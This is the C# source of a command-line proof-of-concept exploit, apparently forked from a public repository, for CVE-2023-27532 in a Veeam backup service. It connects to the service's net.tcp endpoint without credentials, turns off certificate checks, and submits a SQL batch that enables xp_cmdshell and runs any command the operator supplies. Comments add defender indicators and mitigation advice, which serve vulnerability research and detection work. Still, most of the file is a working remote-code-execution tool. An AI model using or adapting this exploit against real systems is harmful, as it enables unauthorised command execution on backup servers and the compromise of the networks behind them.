forked from sfewer-r7/CVE-2023-27532
Program.cs
using System;
using System.ServiceModel;
using System.ServiceModel.Security;
using Veeam.Backup.Interaction.MountService;
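namespace VeeamHax
{
    /// <summary>
    /// Command-line proof of concept for CVE-2023-27532 (per the repository name).
    /// It builds a WCF net.tcp client for <see cref="IRemoteInvokeService"/> that presents
    /// no client credentials and, when <c>--cmd</c> is supplied, submits a SQL batch through
    /// <c>GetDataTable</c>.
    /// </summary>
    /// <remarks>
    /// Reviewer notes for defenders, derived from what this file sends:
    /// <list type="bullet">
    /// <item>Network: a net.tcp connection to the service port (9401 by default here) from a
    /// host that is not part of the backup infrastructure is the first observable.</item>
    /// <item>Database: the batch flips 'show advanced options' and 'xp_cmdshell' on via
    /// sp_configure and never reverts them, so an instance left with xp_cmdshell enabled is
    /// a residual artifact. Presumably this is the instance backing the Veeam configuration
    /// database; confirm against the deployment.</item>
    /// <item>Host: xp_cmdshell runs the command under the SQL Server service, so unexpected
    /// child processes of that service are worth alerting on.</item>
    /// <item>Mitigation: apply the vendor fix for CVE-2023-27532 and restrict access to the
    /// service port to the hosts that need it.</item>
    /// </list>
    /// </remarks>
    internal class Program
    {
        /// <summary>
        /// Parses the command line, builds the channel and optionally submits the SQL batch.
        /// </summary>
        /// <param name="args">
        /// <c>--target HOST</c>, <c>--port N</c>, <c>--cmd COMMAND</c>, <c>--verbose</c>,
        /// or <c>--help</c> / <c>-h</c> / <c>/?</c>.
        /// </param>
        static void Main(string[] args)
        {
            string host = "127.0.0.1";
            int port = 9401;
            bool verbose = false;
            string cmd = null;

            for (int i = 0; i < args.Length; i++)
            {
                bool hasValue = i + 1 < args.Length;

                if (args[i] == "--target" && hasValue)
                {
                    // ++i consumes the value so it is not re-read as an option name.
                    host = args[++i];
                }
                else if (args[i] == "--port" && hasValue)
                {
                    string rawPort = args[++i];
                    int parsedPort;

                    // Int32.Parse threw an unhandled FormatException/OverflowException here;
                    // reject non-numeric and out-of-range ports with a message instead.
                    bool parsed = int.TryParse(
                        rawPort,
                        System.Globalization.NumberStyles.Integer,
                        System.Globalization.CultureInfo.InvariantCulture,
                        out parsedPort);
                    if (!parsed || parsedPort < 1 || parsedPort > 65535)
                    {
                        Console.Error.WriteLine("Invalid --port value: {0}", rawPort);
                        return;
                    }

                    port = parsedPort;
                }
                else if (args[i] == "--verbose")
                {
                    verbose = true;
                }
                else if (args[i] == "--cmd" && hasValue)
                {
                    cmd = args[++i];
                }
                else if (args[i] == "--help" || args[i] == "-h" || args[i] == "/?")
                {
                    Console.WriteLine("Usage: VeeamHax.exe [--verbose] --target 192.168.0.1 --port 9401 [--cmd \"c:\\windows\\notepad.exe\"]");
                    return;
                }
            }

            Console.WriteLine("Targeting {0}:{1}", host, port);

            // Transport security with ClientCredentialType.None: the channel is encrypted
            // but the client presents no credentials of its own.
            NetTcpBinding binding = new NetTcpBinding();
            binding.Security.Mode = SecurityMode.Transport;
            binding.Security.Transport.ClientCredentialType = TcpClientCredentialType.None;
            binding.Name = "foo";

            Uri uri = new Uri($"net.tcp://{host}:{port}/");
            EndpointAddress endpoint = new EndpointAddress(uri, EndpointIdentity.CreateDnsIdentity("Veeam Backup Server Certificate"));

            ChannelFactory<IRemoteInvokeService> channelFactory = new ChannelFactory<IRemoteInvokeService>(binding, endpoint);
            try
            {
                // Validation mode None: the service certificate is accepted without
                // chain or trust checks.
                channelFactory.Credentials.ServiceCertificate.SslCertificateAuthentication = new X509ServiceCertificateAuthentication
                {
                    CertificateValidationMode = X509CertificateValidationMode.None
                };

                IRemoteInvokeService channel = channelFactory.CreateChannel(endpoint);

                // Without --cmd no service call is made at all.
                if (cmd != null)
                {
                    // The batch enables 'show advanced options' and 'xp_cmdshell' through
                    // sp_configure, then runs the --cmd value with xp_cmdshell. Nothing
                    // here turns either setting back off afterwards.
                    // The verbatim string is kept flush left so its bytes are unchanged.
                    string spec = $@"
<RemoteInvokeSpec ContextSessionId=""{Guid.NewGuid()}"">
<DbGetDataTableRemoteInvokeSpec>
<SqlCommand>EXEC sp_configure 'show advanced options', 1; EXEC sp_configure reconfigure; EXEC sp_configure 'xp_cmdshell', 1; EXEC sp_configure reconfigure; EXEC xp_cmdshell '{cmd}';</SqlCommand>
<CommandType>1</CommandType>
</DbGetDataTableRemoteInvokeSpec>
</RemoteInvokeSpec>
";
                    channel.GetDataTable(ERemoteInvokeScope.DatabaseAccessor, ERemoteInvokeMethod.GetDataTable, spec);

                    if (verbose)
                    {
                        Console.WriteLine("Executed command: {0}", cmd);
                    }
                }
            }
            finally
            {
                // The factory was never released before. Close() throws when the factory
                // is faulted; Abort() tears it down without throwing.
                try
                {
                    channelFactory.Close();
                }
                catch (Exception)
                {
                    channelFactory.Abort();
                }
            }
        }
    }
}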